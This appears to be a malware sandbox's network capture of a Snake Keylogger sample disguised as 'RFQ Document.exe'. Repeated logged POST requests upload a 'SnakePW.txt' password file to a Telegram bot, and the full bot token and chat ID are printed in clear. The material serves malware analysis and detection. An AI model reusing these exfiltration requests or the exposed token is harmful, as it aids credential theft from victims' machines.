PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:33 UTC	360	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:33 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:33 UTC	360	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12812,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808773,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
227	192.168.2.4	50048	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:33 UTC	360	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ed7a5e75 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:33 UTC	361	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 64 37 61 35 65 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ed7a5e75Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:34 UTC	361	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:34 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:34 UTC	362	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 33 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12813,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808773,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
228	192.168.2.4	50049	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:34 UTC	362	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ed995e14 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:34 UTC	362	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 64 39 39 35 65 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ed995e14Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:34 UTC	363	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:34 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:34 UTC	363	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12815,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808774,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
229	192.168.2.4	50050	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:34 UTC	364	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255edb5f876 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:34 UTC	364	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 64 62 35 66 38 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255edb5f876Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:34 UTC	364	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:34 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:34 UTC	365	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12816,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808774,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.4	49797	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:25 UTC	36	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c4957484 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:25 UTC	36	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 34 39 35 37 34 38 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c4957484Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:25 UTC	37	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:25 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:25 UTC	37	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 30 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 35 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12603,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808705,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
230	192.168.2.4	50051	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:34 UTC	365	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255eddc1e0b Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:34 UTC	366	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 64 64 63 31 65 30 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255eddc1e0bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:34 UTC	366	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:34 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:34 UTC	366	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12817,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808774,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
231	192.168.2.4	50052	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:34 UTC	367	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255edf3f502 Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:34 UTC	367	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 64 66 33 66 35 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255edf3f502Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:34 UTC	368	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:34 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:34 UTC	368	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 34 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12818,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808774,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
232	192.168.2.4	50053	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:59:34 UTC	369	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ee0bccbd Host: api.telegram.org Content-Length: 407
2021-09-28 05:59:34 UTC	369	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 65 30 62 63 63 62 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ee0bccbdContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:59:35 UTC	369	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:59:35 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:59:35 UTC	370	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 38 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 37 35 2c 22 64 Data Ascii: 